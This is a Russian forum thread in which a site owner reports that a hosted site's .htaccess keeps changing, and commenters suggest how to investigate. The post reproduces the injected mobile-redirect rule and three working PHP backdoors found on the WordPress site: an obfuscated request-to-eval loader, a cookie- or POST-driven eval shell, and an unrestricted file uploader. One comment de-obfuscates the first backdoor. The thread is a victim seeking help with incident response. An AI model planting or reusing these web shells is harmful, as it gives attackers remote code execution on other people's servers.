# Что то изменяет .htaccess

Tags: php, .htaccess, hosting

Есть хостинг на reg.ru.
В последнее время через несколько дней меняется .htaccess  на сайте в корневом каталоге.

```
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://crazytds.club/redirect.php [R,L]
```

Права на файл 644, пароль пользователя был изменен, в history моего пользователя ничего подозрительного нет, crontab - чист, доступа к руту на сервере нет.
НА хостинге есть несколько сайтов на старых допотопных движках, там в основном только изменены .htaccess Также есть сайт на wordpress там помимо .htaccess были изменены web-config.php, появились файлы id.php,
`<?php $b = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$c = $_REQUEST["q"];$c1 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(47).chr(116).chr(109).chr(112).chr(47).chr(102).chr(103).chr(100).chr(102).chr(103).chr(100).chr(102).chr(103);$d1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$f = chr(117).chr(110).chr(108).chr(105).chr(110).chr(107);$c1($d,$d1.$b($c));include($d);$f($d); ?>`
 и куча файлов типа web.config.180924125627.orig  .htaccess.180924125627.orig

```
<?xml version="1.0" encoding="UTF-8"?>
Reset by Duplicator Installer.  Original can be found in web.config.180924125627.orig
```

В корне вордпрессовского сайта был wp-ajax-hook.php

```
<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?>
<?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?>
<?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}
echo('This shit works!');
```

И wp-upload-class.php

```
<?php
echo "This shit works!";
if (isset($_FILES["filename"]))
{
if($_FILES["filename"]["size"] > 1024*3*1024)
{
 echo ("File too large (more than 3Mb)");
 exit;
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
 move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
 echo ("<br>Done!<br>");
} else {
  echo("<br>Error! ".$php_errormsg."<br>");
}
}
?>
```

Comment: Скрипты тоже могут изменять файлы. Видимо у вас какой-то движок с дырочкой.

Comment: в какую сторону смотреть не подскажите?

Comment: Лучше дайте тому, кто разбирается. Если хотите сами попробовать, надо просматривать скрипты и искать уязвимости, в гугле можно найти информацию о `php-шелл`ах, `backdoor`ах и т.д.

Comment: А не могли сделать пхп-файл на сервере и просто запускают его теперь ?

Comment: Ага, и название файла `Файл_который_меняет_htaccess.php`. Смысл этих дыр в том, чтобы быть максимально замаскированными. Конечно может быть и отдельным, все вообще может быть, может бы и то, что вы его сами меняете, пока спите, но чаще всего он где-то в кучке кода.

Comment: Если есть возможность сделать чистую копию сайта (без бэкдора), то можно будет потом через diff найти отличия в боевой директории от эталонной

Comment: чистой копии нет. довольно грустная ситуация вырисовывается. Буду смотреть логи мб там что всплывет..

Comment: Добавил новые вещи которые нашел

Comment: @ArchDemon дифнуть до и после - найдете результат, но первоисточник найти не получится

Comment: Могу перевести что там написано: `$b = "base64_decode";$c = $_REQUEST["q"];$c1 = "file_put_contents";$d = "/tmp/fgdfgdfg";$d1 = "";$f = "unlink";$c1($d,$d1.$b($c));include($d);$f($d);` - По логике видно что вам приходит `q` реквестом, в этой переменной ссылка на текст с вредоносным кодом, этот текст сохраняется в файл к вам на сервер, выполняется и удаляется.

Comment: я так понимаю это и есть тот шелл о котором вы писали выше?

Comment: `wp-upload-class.php` файл агонь. Проверять нужно на расширение файла и mime тип. Нужно запрещать загрузку исполняемых файлов (например, php). Или делать невозможным их запуск через uri

Comment: а можно для совсем умственно отсталых?